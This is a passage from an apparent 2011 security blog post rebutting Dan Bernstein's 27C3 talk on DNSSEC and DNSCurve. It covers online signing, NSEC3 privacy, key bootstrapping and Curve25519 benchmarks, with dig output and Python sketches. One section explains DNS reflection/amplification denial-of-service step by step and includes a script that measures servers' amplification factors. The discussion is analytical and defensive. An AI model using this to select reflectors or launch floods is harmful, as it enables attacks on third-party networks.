DNSSEC Interlude 2: DJB@CCC

January 5, 2011

Short Version: Dan Bernstein delivered a talk at the 27C3 about DNSSEC and his vision for authenticating and encrypting the net. While it is gratifying to see such consensus regarding both the need to fix authentication and encryption, and the usefulness of DNS to implement such a fix, much of his representation of DNSSEC — and his own replacement, DNSCurve — was plainly inaccurate. He attacks a straw man implementation of DNSSEC that must sign records offline, despite all major DNSSEC servers moving to deep automation to eliminate administrator errors, and despite the existence of Phreebird, my online DNSSEC signing proxy specifically designed to avoid the faults he identifies.

DJB complains about NSEC3’s impact on the privacy of domain names, despite the notably weak privacy guarantees on public DNS names themselves, and more importantly, the code in Phreebird that dynamically generates NSEC3 records thus completely defeating GPU hashcracking. He complains about DNSSEC as a DDoS bandwidth amplifier, while failing to mention that the amplification issues are inherited from DNS. I observe his own site, cr.yp.to, to be a 6.4x bandwidth amplifier, and the worldwide network of open recursive servers to be infinitely more exploitable even without DNSSEC. DJB appeared unaware that DNSSEC could be leveraged to offer end to end semantics, or that constructions existed to use secure offline records to authenticate protocols like HTTPS. I discuss implementations of both in Phreebird.

From here, I analyze Curve25519, and find it a remarkably interesting technology with advantages in size and security. His claims regarding instantaneous operation are a bit of an exaggeration though; initial benchmarking puts Curve25519 at about 4-8x the speed of RSA1024. I discuss the impact of DNSCurve on authoritative servers, which DJB claims to be a mere 1.15x increase in traffic. I present data from a wide variety of sources, including the 27C3 network, demonstrating that double and even triple digit traffic increases are in fact likely, particularly to TLDs. I also observe that DNSCurve has unavoidable effects on query latency, server CPU and memory, and key risk management. The argument that DNSSEC doesn’t sign enough, because a signature on .org doesn’t necessarily sign all of wikipedia.org, is shown to be specious, in that any delegated namespace with unsigned children (including in particular DNSCurve) must have this characteristic.

I move on to discussing end to end protocols. CurveCP is seen as interesting and highly useful, particularly if it integrates a lossy mode. However, DJB states that CurveCP will succeed where HTTPS has failed because CurveCP’s cryptographic primitive (Curve25519) is faster. Google is cited as an organization that has not been able to deploy HTTPS because the protocol is too slow. Actual source material from Google is cited, directly refuting DJB’s assertion. It is speculated that the likely cause of Google’s sudden deployment of HTTPS on GMail was an attack by a foreign power, given that the change was deployed 24 hours after disclosure of the attack. Other causes for HTTPS’s relative rarity are cited, including the large set of servers that need to be simultaneously converted, the continuing inability to use HTTPS for virtual hosted sites, and the need for interaction with third party CA’s.

We then proceed to explore DJB’s model for key management. Although DJB has a complex system in DNSCurve for delegated key management, he finds himself unable to trust either the root or TLDs. Without these trusted third parties, his proposal devolves to the use of “Nym” URLs like http://Z0z9dTWfhtGbQ4RoZ08e62lfUA5Db6Vk3Po3pP9Z8tM.twitter.com to bootstrap key acquisition for Twitter. He suggests that perhaps we can continue to use at least the TLDs to determine IP addresses, as long as we integrate with an as-yet unknown P2P DNS system as well.

I observe this is essentially a walk of Zooko’s Triangle, and does not represent an effective or credible solution to what we’ve learned is the hardest problem at the intersection of security and cryptography: Key Management. I conclude by pointing out that DNSSEC does indeed contain a coherent, viable approach to key management across organizational boundaries, while this talk — alas — does not.


So, there was a talk at the 27th Chaos Communication Congress about DNSSEC after all!  Turns out Dan Bernstein, better known as DJB, is not a fan.

That’s tragic, because I’m convinced he could do some fairly epic things with the technology.

Before I discuss the talk, there are three things I’d like to point out.  First, you should see the talk!  It’s actually a pretty good summary of a lot of latent assumptions that have been swirling around DNSSEC for years — assumptions, by the way, that have been held as much by defenders as detractors.  Here are links:

Video
Slides

Second, I have a tremendous amount of respect for Dan Bernstein.  It was his fix to the DNS that I spent six months pushing, to the exclusion of a bunch of other fixes which (to be gentle) weren’t going to work.  DJB is an excellent cryptographer.

And, man, I’ve been waiting my entire career for Curve25519 to come out.

But security is bigger than cryptography.

The third thing I’d like to point out is that, with DJB’s talk, a somewhat surprising consensus has taken hold between myself, IETF WG’s, and DJB.  Essentially, we all agree that:

1) Authentication and encryption on the Internet is broken,
2) Fixing both would be a Big Deal,
3) DNS is how we’re going to pull this off.

Look, we might disagree about the finer details, but that’s a fairly incredible amount of consensus across the engineering spectrum:  There’s a problem.  We have to fix it.  We know what we’re going to use to fix it.

That all identified, let’s discuss the facts.

Section Index

Well, this document got a bit larger than expected (understatement), so here’s a list of section headings.

DNSSEC’s Problem With Key Rotation Has Been Automated Away
DNSSEC Is Not Necessarily An Offline Signer — In Fact, It Works Better Online!
DNS Leaks Names Even Without NSEC3 Hashes
NSEC3 “White Lies” Entirely Eliminate The NSEC3 Leaking Problem
DNSSEC Amplification is not a DNSSEC bug, but an already existing DNS, UDP, and IP Bug
DNSSEC Does In Fact Offer End To End Resolver Validation — Today
DNSSEC Bootstraps Key Material For Protocols That Desperately Need It — Today
Curve25519 Is Actually Pretty Cool
Limitations of Curve25519
DNSCurve Destroys The Caching Layer.  This Matters.
DNSCurve requires the TLDs to use online signing
DNSCurve, even with Curve25519, has some CPU/Memory Performance Issues
DNSCurve increases query latency
DNSCurve Also Can’t Sign For Its Delegations
What About CurveCP?
HTTPS Has 99 Problems But Speed Ain’t One
There Is No “On Switch” For HTTPS
HTTPS Certificate Management Is Still A Problem!
The Biggest Problem:  Zooko’s Triangle
The Bottom Line:  It Really Is All About Key Management


DNSSEC’s Problem With Key Rotation Has Been Automated Away

From slide 48 to slide 53, DJB discusses what would appear to be a core limitation of DNSSEC:  Its use of offline signing.  According to the traditional model for DNSSEC, keys are kept in a vault offline, only pulled out during those rare moments where a zone must change or be resigned.  He observes a host of negative side effects, including an inability to manage dynamic domains, increased memory load from larger zones, and difficulties manually rotating signatures and keys.

But these are not limitations to DNSSEC as a protocol.  They’re implementation artifacts, no more inherent to DNSSEC than publicfile’s inability to support PHP.  (Web servers were not originally designed to support dynamic content, the occasional cgi-bin notwithstanding.  So, we wrote better web servers!)  Key rotation is the source of some enormous portion of DNSSEC’s historical deployment complexity, and as such pretty much every implementation has automated it — even at the cost of having the “key in a vault”. See production-ready systems by:

  1. BIND 9.7 — “DNSSEC For Humans”
  2. OpenDNSSEC
  3. Xelerance
  4. Secure64
  5. InfoBlox
  6. Verisign

So, on a purely factual basis, the implication that DNSSEC creates an “administrative disaster” under conditions of frequent resigning is false.  Everybody’s automating.  Everybody. But his point that offline signing is problematic for datasets that change with any degree of frequency is in fact quite accurate.

But who says DNSSEC needs to be an offline signer, signing all its records in advance?


DNSSEC Is Not Necessarily An Offline Signer — In Fact, It Works Better Online!

Online signing has long been an “ugly duckling” of DNSSEC.  In online signing, requests are signed “on demand” — the keys are pulled out right when the response is generated, and the appropriate imprimatur is applied.  While this seems scary, keep in mind this is how SSL, SSH, IPSec, and most other crypto protocols function.  DJB’s own DNSCurve is an online signer.

PGP/GPG are not online signers.  They have dramatic scalability problems, as nobody says aloud but we all know.  (To the extent they will be made scalable, they will most likely be retrieving and refreshing key material via DNSSEC.)

Online signing has history with DNSSEC.  RFC4470 and RFC4471 discuss the precise ways and means online signing can integrate with the original DNSSEC.  Bert Hubert’s been working on PowerDNSSEC for some time, which directly integrates online signing into very large scale hosting.

And then there’s Phreebird.  Phreebird is my DNSSEC proxy; I’ve been working on it for some time.  Phreebird is an online signer that operates, “bump in the wire” style, in front of existing DNS infrastructure.  (This should seem familiar; it’s the deployment model suggested by DJB for DNSCurve.)  Got a dynamic signer, that changes up responses according to time of day, load, geolocation, or the color of its mood ring?  I’ve been handling that for months.  Worried about unpredictable requests?  Phreebird isn’t, it signs whatever responses go by.  If new responses are sent, new signatures will be generated.  Concerned about preloading large zones?  Don’t be, Phreebird’s cache can be as big or as little as you want it to be.  It preloads nothing.

As for key and signature rotation, Phreebird can be trivially modified to sign everything with a 5 minute signature — in case you’re particularly concerned with replay.  Online signing really does make things easier.
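
To make the “sign whatever goes by” model concrete, here’s a toy sketch of the core loop. It is not Phreebird’s actual code, just the shape of it: it assumes the pyca/cryptography package, uses Ed25519 purely as a stand-in for whatever algorithm the zone really runs, and waves away all the DNS wire-format details.

import hashlib
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

zone_key = Ed25519PrivateKey.generate()   # stand-in for the real zone signing key
sig_cache = {}                            # answer fingerprint -> signature

def sign_on_demand(answer_wire: bytes) -> bytes:
    # Sign an answer the moment it goes by; cache by content so the expensive
    # operation happens once per distinct answer, not once per query.
    fingerprint = hashlib.sha256(answer_wire).digest()
    if fingerprint not in sig_cache:
        sig_cache[fingerprint] = zone_key.sign(answer_wire)
    return sig_cache[fingerprint]

Nothing is precomputed, the cache can be as big or as small as you like, and a dynamic backend that changes its answers simply causes fresh signatures to appear alongside the new answers.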


DNS Leaks Names Even Without NSEC3 Hashes

Phreebird can also deal with NSEC3’s “leaking”.  Actually, it does so by default.

In the beginning, DNSSEC’s developers realized they needed a feature called Authoritative Nonexistence — a way of saying, “The record you are looking for does not exist, and I can prove it”.  This posed a problem.  While there is usually a finite number of names that do exist, the number of non-existent names is effectively infinite.  Unique proofs of nonexistence couldn’t be generated for all of them, but the designers really wanted to avoid requiring online signing.  (Just because we can sign online, doesn’t mean we should have to sign online.)  So they said they’d sign ranges — say there were no names between Alice and Bob, and Bob and Charlie, and Charlie and David.

This wasn’t exactly appreciated by Alice, Bob, Charlie, and David — or, at least, the registries that held their domains.  So, instead, Alice, Bob, Charlie, and David’s names were all hashed — and then the statement became, there are no names between H1 (the hash of Charlie) and H2 (the hash of Alice).  That, in a nutshell, is NSEC3.

DJB observes, correctly, that there’s only so much value one gets from hashing names.  He quotes Ruben Niederhagen as being able to crack through 1.7 trillion names a day, for example.

This is imposing, until one realizes that at 10,000 queries a second, an attacker can sweep a TLD through about 864,000,000 queries a day.  Granted:  This is not as fast, but it’s much faster than your stock SSHD brute force, and we see substantial evidence of those all the time.

Consider: Back in 2009, DJB used hashcracking to answer Frederico Neves’ challenge to find domains inside of sec3.br. You can read about this here. DJB stepped up to the challenge, and the domains he (and Tanja Lange) found were:

douglas, pegasus, rafael, security, unbound, while42, zz–zz

It does not take 1.7T hashcracks to find these names. It doesn’t even take 864M. Domain names are many things; compliant with password policies is not one of them. Ultimately, the problem with assuming privacy in DNS names is that they’re being published openly to the Internet.  What we have here is not a bright line differential, but a matter of degree.

If you want your names completely secret, you have to put them behind the split horizon of a corporate firewall — as many people do.  Most CorpNet DNS is private.


NSEC3 “White Lies” Entirely Eliminate The NSEC3 Leaking Problem

However, suppose you want the best of both worlds:  Secret names that are globally valid (at the accepted cost of online brute-forceability).  Phreebird has you covered — by generating what can be referred to as NSEC3 White Lies.  H1 — the hash of Charlie — is a number.  It’s perfectly valid to say:

There are no records with a hash between H1-1 and H1+1.

Since there’s only one number between H1-1 and H1+1 — H1 itself, the hash of Charlie — authoritative nonexistence is validated, without leaking the next actual hash after H1.
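
Here’s a minimal sketch of that trick: the RFC 5155 hash, then a covering range one step on either side of it. It’s illustrative only (hex output instead of the base32hex encoding real NSEC3 records use, and no salt or iteration tuning).

import hashlib

def nsec3_digest(name, salt=b"", iterations=0):
    # RFC 5155: iterated SHA-1 over the wire-format owner name plus the salt
    wire = b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.lower().rstrip(".").split(".") if label) + b"\x00"
    digest = hashlib.sha1(wire + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    return digest

def white_lie(qname, salt=b"", iterations=0):
    # Claim there are no names between H-1 and H+1: a range containing only H
    # itself, proving nonexistence without disclosing anyone else's hashes.
    h = int.from_bytes(nsec3_digest(qname, salt, iterations), "big")
    space = 2 ** 160  # SHA-1 output space; wrap around at the edges
    prev = ((h - 1) % space).to_bytes(20, "big")
    nxt = ((h + 1) % space).to_bytes(20, "big")
    return prev.hex(), nxt.hex()

print(white_lie("doesnotexist.example.org"))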


DNSSEC Amplification is not a DNSSEC bug, but an already existing DNS, UDP, and IP Bug

Probably the most quoted comment of DJB was the following:

“So what does this mean for distributed denial of service amplification, which is the main function of DNSSEC”

Generally, what he’s referring to is that an attacker can:

  1. Spoof the source of a DNSSEC query as some victim target (32 byte DNS query + 8 byte UDP header + 20 byte IP header = 60 byte packet, raised to 64 bytes due to the minimum transmission unit)
  2. Make a request that returns a lot of data (say, 2K, creating a 32x amplification)
  3. GOTO 1

It’s not exactly a complicated attack.  However, it’s not a new attack either.  Here’s a SANS entry from 2009, discussing attacks going back to 2006.  Multi gigabit floods bounced off of DNS servers aren’t some terrifying thing from the future; they’re just part of the headache that is actively managing an Internet with ***holes in it.

There is an interesting game, one that I’ll definitely be writing about later, called “Whose bug is it anyway?”.  It’s easy to blame DNSSEC, but there’s a lot of context to consider.

Ultimately, the bug is IP’s, since IP (unlike many other protocols) allows long distance transit of data without a server explicitly agreeing to receive it.  IP effectively trusts its applications to “play nice” — shockingly, this was designed in the 80’s.  UDP inherits the flaw, since it’s just a thin application wrapper around IP.

But the actual fault lies in DNS itself, as the amplification begins in earnest with plain, unsigned DNS queries. During the last batch of gigabit floods, the root servers were used — they returned 330 bytes out for every 64 byte packet in.  Consider, though, the following completely randomly chosen query:

# dig +trace cr.yp.to any
cr.yp.to. 600 IN MX 0 a.mx.cr.yp.to.
cr.yp.to. 600 IN MX 10 b.mx.cr.yp.to.
cr.yp.to. 600 IN A 80.101.159.118
yp.to. 259200 IN NS a.ns.yp.to.
yp.to. 259200 IN NS uz5uu2c7j228ujjccp3ustnfmr4pgcg5ylvt16kmd0qzw7bbjgd5xq.ns.yp.to.
yp.to. 259200 IN NS b.ns.yp.to.
yp.to. 259200 IN NS f.ns.yp.to.
yp.to. 259200 IN NS uz5ftd8vckduy37du64bptk56gb8fg91mm33746r7hfwms2b58zrbv.ns.yp.to.
;; Received 414 bytes from 131.193.36.24#53(f.ns.yp.to) in 32 ms

So, the main function of Dan Bernstein’s website is to provide a 6.4x multiple to all DDoS attacks, I suppose?

I keed, I keed.  Actually, the important takeaway is that practically every authoritative server on the Internet provides a not-insubstantial amount of amplification.  Taking the top 1000 QuantCast names (minus the .gov stuff, just trust me, they’re their own universe of uber-weird; I wouldn’t judge X.509 on the Federal Bridge CA), we see:

  • An average ANY query returns 413.9 bytes (seriously!)
  • Almost half (460) return 413 bytes or more

So, the question then is not “what is the absolute amplification factor caused by DNSSEC”, it’s “What is the amplification factor caused by DNSSEC relative to DNS?”
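
You don’t have to take my word for the numbers; the experiment is easy to reproduce. Here’s a rough sketch with dnspython (assuming it’s installed; it ignores EDNS buffer sizes and truncation, and the zone and server are simply the ones from the dig output below), comparing the size of an ANY response with and without the DNSSEC OK bit:

import dns.message, dns.query

def amplification(qname, server, want_dnssec):
    query = dns.message.make_query(qname, "ANY", want_dnssec=want_dnssec)
    response = dns.query.udp(query, server, timeout=5)
    return len(response.to_wire()) / len(query.to_wire())

# pir.org and one of its authoritative servers, as seen in the dig output below
print("plain DNS  :", amplification("pir.org.", "199.19.50.79", False))
print("with DNSSEC:", amplification("pir.org.", "199.19.50.79", True))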

It ain’t 90x, I can tell you that much.  Here is a query for www.pir.org ANY, without DNSSEC:

www.pir.org. 300 IN A 173.201.238.128
pir.org. 300 IN NS ns1.sea1.afilias-nst.info.
pir.org. 300 IN NS ns1.mia1.afilias-nst.info.
pir.org. 300 IN NS ns1.ams1.afilias-nst.info.
pir.org. 300 IN NS ns1.yyz1.afilias-nst.info.
;; Received 329 bytes from 199.19.50.79#53(ns1.sea1.afilias-nst.info) in 90 ms

And here is the same query, with DNSSEC:

www.pir.org. 300 IN A 173.201.238.128
www.pir.org. 300 IN RRSIG A 5 3 300 20110118085021 20110104085021 61847 pir.org. n5cv0V0GeWDPfrz4K/CzH9uzMGoPnzEr7MuxPuLUxwrek+922xiS3BJG NfcM9nlbM5GZ5+UPGv668NJ1dx6oKxH8SlR+x3d8gvw2DHdA51Ke3Rjn z+P595ZPB67D9Gh6l61itZOJexwsVNX4CYt6CXTSOhX/1nKzU80PVjiM wg0=
pir.org. 300 IN NS ns1.mia1.afilias-nst.info.
pir.org. 300 IN NS ns1.yyz1.afilias-nst.info.
pir.org. 300 IN NS ns1.ams1.afilias-nst.info.
pir.org. 300 IN NS ns1.sea1.afilias-nst.info.
pir.org. 300 IN RRSIG NS 5 2 300 20110118085021 20110104085021 61847 pir.org. IIn3FUnmotgv6ygxBM8R3IsVv4jShN71j6DLEGxWJzVWQ6xbs5SIS0oL OA1ym3aQ4Y7wWZZIXpFK+/Z+Jnd8OXFsFyLo1yacjTylD94/54h11Irb fydAyESbEqxUBzKILMOhvoAtTJy1gi8ZGezMp1+M4L+RvqfGze+XFAHN N/U=
;; Received 674 bytes from 199.19.49.79#53(ns1.yyz1.afilias-nst.info) in 26 ms

About a 2x increase. Not perfect, but not world ending. Importantly, it’s nowhere close to the actual problem:

Open recursors.

DNS comes from 1983, when the load of running around the Internet mapping names to numbers was actually fairly high. As such, it acquired a caching layer — a horde of BIND, Nominum, Unbound, MSDNS, PowerDNS, and other servers that acted as a middle layer between the masses of clients and the authoritative servers of the Internet.

At any given point, there’s between three and twelve million IP addresses on the Internet that operate as caching resolvers, and will receive requests from and send arbitrary records to any IP on the Internet.

Arbitrary attacker controlled records.

;; Query time: 5 msec
;; SERVER: 4.2.2.1#53(4.2.2.1)
;; WHEN: Tue Jan 4 11:10:59 2011
;; MSG SIZE rcvd: 3641

That’s a 3.6KB response to a 64 byte request, no DNSSEC required. I’ve been saying this for a while: DNSSEC is just DNS with signatures. Whose bug is it anyway? Well, at least some of those servers are running DJB’s dnscache…

So, what do we do about this? One option is to attempt further engineering: There are interesting tricks that can be run with ICMP to detect the flooding of an unwilling target. We could also have an RBL — realtime blackhole list — of IP addresses that are under attack. This would get around the fact that this attack is trivially distributable.

Another approach is to require connections that appear “sketchy” to upgrade to TCP.  There’s support in DNS for this — the TC bit — and it’s been deployed with moderate success by at least one major DNS vendor.  There’s some open questions regarding the performance of TCP in DNS, but there’s no question that kernels nowadays are at least capable of being much faster.
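
The mechanics of that upgrade are already sitting in every resolver library. A sketch of the client side of the TC-bit dance, again with dnspython (192.0.2.1 is a placeholder server):

import dns.flags, dns.message, dns.query

query = dns.message.make_query("example.com.", "ANY")
response = dns.query.udp(query, "192.0.2.1", timeout=5)
if response.flags & dns.flags.TC:
    # the server set the truncation bit -- retry over TCP, which can't be
    # driven by a single spoofed packet the way UDP can
    response = dns.query.tcp(query, "192.0.2.1", timeout=5)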

It’s an open question what to do here.

Meanwhile, the attackers chuckle. As DJB himself points out, they’ve got access to 2**23 machines — and these aren’t systems that are limited to speaking random obscure dialects of DNS that can be blocked anywhere on path with a simple pattern matching filter. These are actual desktops, with full TCP stacks, that can join IRC channels and be told to flood the financial site of the hour, right down to the URL!

If you’re curious why we haven’t seen more DNS floods, it might just be because HTTP floods work a heck of a lot better.


DNSSEC Does In Fact Offer End To End Resolver Validation — Today

On Slide 36, DJB claims the following is possible:

Bob views Alice’s web page on his Android phone. Phone asked hotel DNS cache for web server’s address. Eve forged the DNS response! DNS cache checked DNSSEC but the phone didn’t.

This is true as per the old model of DNSSEC, which inherits a little too much from DNS. As per the old model, the only nodes that participate in record validation are full-on DNS servers. Clients, if they happen to be curious whether a name was securely resolved, have to simply trust the “AD” bit attached to a response.

I think I can speak for the entire security community when I say: Aw, hell no.

The correct model of DNSSEC is to push enough of the key material to the client that it can make its own decisions. (If a client has enough power to run TLS, it has enough power to validate a DNSSEC chain.) In my Domain Key Infrastructure talk, I discuss four ways this can be done. But more importantly, in Phreebird I actually released mechanisms for two of them — chasing, where you start at the bottom of a name and work your way up, and tracing, where you start at the root and work your way down.

Chasing works quite well, and importantly, leverages the local cache. Here is Phreebird’s output from a basic chase command:

        |---www.pir.org. (A)
            |---pir.org. (DNSKEY keytag: 61847 alg: 5 flags: 256)
                |---pir.org. (DNSKEY keytag: 54135 alg: 5 flags: 257)
                |---pir.org. (DS keytag: 54135 digest type: 2)
                |   |---org. (DNSKEY keytag: 1743 alg: 7 flags: 256)
                |       |---org. (DNSKEY keytag: 21366 alg: 7 flags: 257)
                |       |---org. (DS keytag: 21366 digest type: 2)
                |       |   |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                |       |       |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)
                |       |---org. (DS keytag: 21366 digest type: 1)
                |           |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                |               |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)
                |---pir.org. (DS keytag: 54135 digest type: 1)
                    |---org. (DNSKEY keytag: 1743 alg: 7 flags: 256)
                        |---org. (DNSKEY keytag: 21366 alg: 7 flags: 257)
                        |---org. (DS keytag: 21366 digest type: 2)
                        |   |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                        |       |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)
                        |---org. (DS keytag: 21366 digest type: 1)
                            |---. (DNSKEY keytag: 21639 alg: 8 flags: 256)
                                |---. (DNSKEY keytag: 19036 alg: 8 flags: 257)

Chasing isn’t perfect — one of the things Paul Vixie and I have been talking about is what I refer to as SuperChase, encoded by setting both CD=1 (Checking Disabled) and RD=1 (Recursion Desired). Effectively, there are a decent number of records between www.pir.org and the root. With the advent of sites like OpenDNS and Google DNS, that might represent a decent number of round trips. As a performance optimization, it would be good to eliminate those round trips, by allowing a client to say “please fill your response with as many records as possible, so I can minimize the number of requests I need to make”.

But the idea that anybody is going to use a DNSSEC client stack that doesn’t provide end to end semantics is unimaginable. After all, we’re going to be bootstrapping key material with this.
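
For a sense of what one link of that chain looks like in code, here’s a sketch using dnspython with its DNSSEC extras installed. It checks only that a zone’s DNSKEY RRset is self-signed; a real chase continues with the DS in the parent, the parent’s DNSKEY, and so on up to the root trust anchor, and handles truncation and TCP fallback along the way.

import dns.dnssec, dns.message, dns.name, dns.query, dns.rdataclass, dns.rdatatype

def validate_dnskey_link(zone, server):
    zname = dns.name.from_text(zone)
    query = dns.message.make_query(zname, dns.rdatatype.DNSKEY, want_dnssec=True)
    response = dns.query.udp(query, server, timeout=5)
    dnskey = response.find_rrset(response.answer, zname,
                                 dns.rdataclass.IN, dns.rdatatype.DNSKEY)
    rrsig = response.find_rrset(response.answer, zname,
                                dns.rdataclass.IN, dns.rdatatype.RRSIG,
                                dns.rdatatype.DNSKEY)
    dns.dnssec.validate(dnskey, rrsig, {zname: dnskey})  # raises if nothing verifies

validate_dnskey_link("pir.org.", "199.19.49.79")  # authoritative server seen earlier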


DNSSEC Bootstraps Key Material For Protocols That Desperately Need It — Today

On page 44, DJB claims that because DNSSEC uses offline signing, the only way it could be used to secure web pages is if those pages were signed with PGP.

What? There’s something like three independent efforts to use DNSSEC to authenticate HTTPS sessions.

Leaving aside the fact that DNSSEC isn’t necessarily an offline signer, it is one of the core constructions in cryptography to intermix an authenticator with otherwise-anonymous encryption to defeat an otherwise trivial man in the middle attack. That authenticator can be almost anything — a password, a private key, even a stored secret from a previous interaction. But this is a trivial, basic construction. It’s how EDH (Ephemeral Diffie-Hellman) works!
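
To spell that construction out, here’s a sketch (pyca/cryptography, with X25519 doing the otherwise-anonymous key agreement and Ed25519 standing in for whatever long-term key you bootstrapped, say out of a signed DNS record):

from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey, X25519PublicKey
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

identity = Ed25519PrivateKey.generate()        # long-term key, published out of band

# Server: fresh ephemeral key per session, signed by the long-term identity
server_eph = X25519PrivateKey.generate()
eph_pub = server_eph.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw)
signature = identity.sign(eph_pub)

# Client: verify the ephemeral key really came from the identity it already
# trusts, then complete the exchange; a man in the middle can't forge this
identity.public_key().verify(signature, eph_pub)   # raises on forgery
client_eph = X25519PrivateKey.generate()
shared_secret = client_eph.exchange(X25519PublicKey.from_public_bytes(eph_pub))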

Using keys stored in DNS has been attempted for years. Some mechanisms that come to mind:

  • SSHFP — SSH Fingerprints in DNS
  • CERT — Certificates in DNS
  • DKIM — Domain Keys in DNS

All of these have come under withering criticism from the security community, because how can you possibly trust what you get back from these DNS lookups?

With DNSSEC — even with offline-signed DNSSEC — you can. And in fact, that’s been the constant refrain: “We’ll do this now, and eventually DNSSEC will make it safe.” Intermixing offline signers with online signers is perfectly “legal” — it’s isomorphic to receiving a password in a PGP encrypted email, or sending your SSH public key to somebody via PGP.

So, what I’m shipping today is simple:

www.hospital-link.org IN TXT "v=key1 ha=sha1 h=f1d2d2f924e986ac86fdf7b36c94bcdf32beec15"

That’s an offline-signable blob, and it says “If you use HTTPS to connect to www.hospital-link.org, you will be given a certificate with the SHA1 hash of f1d2d2f924e986ac86fdf7b36c94bcdf32beec15”. As long as the ground truth in this blob can be chained to the DNS root, by the client and not some random name server in a coffee shop, all is well (to the extent SHA-1 is safe, anyway).
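
Checking that blob against the live server takes a few lines of client code. A sketch with dnspython plus the standard library: the host is just the example above, the schema is the one still being argued over, and a real client would of course insist that the TXT lookup itself validated under DNSSEC.

import hashlib, ssl
import dns.resolver

host = "www.hospital-link.org"

# what DNS says the certificate should hash to
txt = next(iter(dns.resolver.resolve(host, "TXT")))
fields = dict(f.split("=", 1) for f in b" ".join(txt.strings).decode().split())

# what the server actually presents
pem = ssl.get_server_certificate((host, 443))
seen = hashlib.sha1(ssl.PEM_cert_to_DER_cert(pem)).hexdigest()

print("match" if seen == fields["h"] else "MISMATCH -- someone is in the middle")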

This is not an obscure process. This is a basic construction. Sure, there are questions to be answered, with a number of us fighting over the precise schema. And that’s OK! Let the best code win.

So why isn’t the best code DNSCurve?


Curve25519 Is Actually Pretty Cool

DNSCurve is based on something totally awesome:  Curve25519.  I am not exaggerating when I say, this is something I’ve wanted from the first time I showed up in Singapore for Black Hat Asia, 9 years ago (you can see vague references to it in the man page for lc).  Curve25519 essentially lets you do this:

If I have a 32 byte key, and you have a 32 byte key, and we both know each other’s key, we can mix them to create a 32 byte secret.

32 bytes is very small.
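
In code, the whole ceremony is about this big (a sketch against the X25519 implementation in pyca/cryptography, which is the same curve):

from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

alice = X25519PrivateKey.generate()
bob = X25519PrivateKey.generate()

# each side mixes its own private key with the other's 32-byte public key...
secret_a = alice.exchange(bob.public_key())
secret_b = bob.exchange(alice.public_key())

# ...and both arrive at the same 32-byte shared secret
assert secret_a == secret_b and len(secret_a) == 32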

What’s more, Curve25519 is fast(er).  Here are comparative benchmarks from a couple of systems:

SYSTEM 1 (Intel Laptop, Cygwin, curve25519-20050915 from DJB):

RSA1024 OpenSSL sign/s:  520.2
RSA1024 OpenSSL verify/s:  10874.0
Curve25519 operations/s:  4131

SYSTEM 2 (Amazon Small VM, curve25519-20050915):

RSA1024 OpenSSL sign/s:  502.6
RSA1024 OpenSSL verify/s:  11689.8
Curve25519 operations/s:  507.25

SYSTEM 3 (Amazon XLarge VM, using AGL’s code here for 64 bit compliance):

RSA1024 OpenSSL sign/s:  1048.4
RSA1024 OpenSSL verify/s:  19695.4
Curve25519 operations/s:  4922.71

While these numbers are a little lower than I remember them — for some reason, I remember 16K/sec — they’re in line with DJB’s comments here:  500M clients a day is about 5787 new sessions a second.  So generally, Curve25519 is about 4 to 8 times faster than RSA1024.
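
If you want numbers in this ballpark from your own hardware, here’s a rough sketch (pyca/cryptography again; note it pits Curve25519 key agreement against RSA1024 signing, which is close to, but not exactly, what DJB’s reference benchmark measures):

import time
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa, x25519

def ops_per_second(fn, seconds=2.0):
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        fn()
        count += 1
    return count / (time.perf_counter() - start)

rsa_key = rsa.generate_private_key(public_exponent=65537, key_size=1024)
message = b"benchmark" * 4
print("RSA1024 sign/s :", ops_per_second(lambda: rsa_key.sign(message, padding.PKCS1v15(), hashes.SHA1())))

mine = x25519.X25519PrivateKey.generate()
theirs = x25519.X25519PrivateKey.generate().public_key()
print("Curve25519 op/s:", ops_per_second(lambda: mine.exchange(theirs)))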

It’s worth noting that, while 4x-8x is significant today, it won’t be within a year or two.  That’s because by then we’ll have RSA acceleration via GPU.  Consider this tech report — with 128 cores, they were able to achieve over 5000 RSA1024 decryption operations per second.  Modern NVIDIA cards have over 512 cores, with across the board memory and frequency increases.   That would put RSA speed quite a bit beyond software Curve25519.  Board cost?  $500.

That being said, Curve25519 is quite secure.  Even with me bumping RSA up to 1280bit in Phreebird by default, I don’t know if I reach the putative level of security in this ECC variant.


Limitations of Curve25519

The most exciting aspect of Curve25519 is its ability to, with relatively little protocol overhead, create secure links between two peers.  The biggest problem with Curve25519 is that it seems to get its performance by sacrificing the capacity to sign once and distribute a message to many parties.  This is something we’ve been able to do with pretty much every asymmetric primitive thus far — RSA, DH (via DSA), ECC (via ECDSA), etc.  I don’t know whether DJB’s intent is to enforce a particular use pattern, or if this is an actual technical limitation.  Either way, Alice can’t sign a message and hand it to Bob, and have Bob prove to Charlie that he received that message from Alice.


DNSCurve Destroys The Caching Layer.  This Matters.

In DNSCurve, all requests are unique — they’re basically cryptographic blobs encapsulated in DNS names, sent directly to target name servers or tunneled through local servers, where they are uncacheable due to their uniqueness.  (Much to my amusement and appreciation, the DNSCurve guys realized the same thing I did — gotta tunnel through TXT if you want to survive.) So one hundred thousand different users at the same ISP, all looking up the same http://www.cnn.com address, end up issuing unique requests that make their way all the way to CNN’s authoritative servers.

Under the status quo, and under DNSSEC, all those requests would never leave the ISP, and would simply be serviced locally.

It was ultimately this characteristic of DNSCurve, above all others, that caused me to reject the protocol in favor of DNSSEC.  It was my estimation that this would cause something like a 100x increase in load on authoritative name servers.

DJB claims to have measured the effect of disabling caching at the ISP layer, and says the increase is little more than 15%, or 1.15x. He declares my speculation “wild”. OK, that’s fine, I like being challenged!  Let’s take a closer look.

